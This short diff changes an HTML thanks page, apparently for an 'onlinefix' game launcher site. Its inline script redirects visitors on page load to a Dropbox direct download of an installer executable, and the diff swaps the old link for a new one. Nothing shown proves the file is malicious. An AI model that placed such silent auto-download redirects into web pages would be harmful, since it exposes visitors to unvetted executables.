--- a/pages/ofmeThanks.html
+++ b/pages/ofmeThanks.html
@@ -68,7 +68,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/hnnq81z3095e8hb7u6q8q/onlinefix_launcher_installer?rlkey=vn0dvwfre3wf0pg4otbiwmva7&st=710928uv&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/uiang0sjv6yy1hkrg864x/onlinefix_launcher_installer?rlkey=c0nlfju1kum23rkdtd8na9rfy&st=1w7jc0gb&dl=1";
     </script>
 </body>
 </html>
